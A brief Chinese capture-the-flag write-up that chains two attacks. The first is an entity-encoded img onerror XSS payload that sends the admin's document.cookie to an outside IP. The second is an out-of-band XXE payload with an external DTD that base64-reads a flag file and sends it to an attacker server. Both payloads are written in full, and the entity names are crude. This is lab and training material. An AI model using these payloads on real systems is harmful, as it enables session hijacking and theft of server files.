用 Tom 的 sid 买 talk, 进入 feedback 界面。

目标是 xss 拿到管理员的 cookie.

过滤了 script 和 '.'

构造 Payload:

<img src="" onerror="&#x76;&#x61;&#x72;&#x20;&#x69;&#x6D;&#x67;&#x20;&#x3D;&#x20;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x72;&#x65;&#x61;&#x74;&#x65;&#x45;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x28;&#x22;&#x69;&#x6D;&#x67;&#x22;&#x29;&#x3B;&#x69;&#x6D;&#x67;&#x2E;&#x73;&#x72;&#x63;&#x3D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x31;&#x30;&#x2E;&#x32;&#x30;&#x39;&#x2E;&#x34;&#x2E;&#x31;&#x36;&#x3A;&#x38;&#x30;&#x30;&#x30;&#x2F;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x22;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x62;&#x6F;&#x64;&#x79;&#x2E;&#x61;&#x70;&#x70;&#x65;&#x6E;&#x64;&#x43;&#x68;&#x69;&#x6C;&#x64;&#x28;&#x69;&#x6D;&#x67;&#x29;&#x3B;" > 

拿到管理员 cookie, 然后进入到一个写日志的界面（懒得找了)。

看起来是个 XXE 注入，构造 payload:

<!DOCTYPE ANY [
<!ENTITY % fuck SYSTEM "http://server/evil.xml">
%fuck;
%send;
%ass;
]>
<note><title>a</title><content>b</content></note>

其中 evil.xml 内容为

<!ENTITY % flag SYSTEM "php://filter/read=convert.base64-encode/resource=file:///aaasssddd/flag">
<!ENTITY % send "<!ENTITY &#37; ass SYSTEM 'http://server/?%flag;'>">

提交，得到 flag